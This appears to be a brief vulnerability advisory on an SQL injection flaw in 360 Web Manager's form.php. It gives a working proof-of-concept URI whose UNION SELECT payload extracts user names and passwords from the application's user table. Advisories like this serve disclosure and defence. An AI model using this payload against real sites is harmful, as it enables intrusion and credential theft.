|
360 Web Manager 'form.php' SQL Injection Vulnerability
An attacker can exploit this issue via a browser. The following proof-of-concept URI is available: http://www.example.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/* |
|
|
Privacy Statement |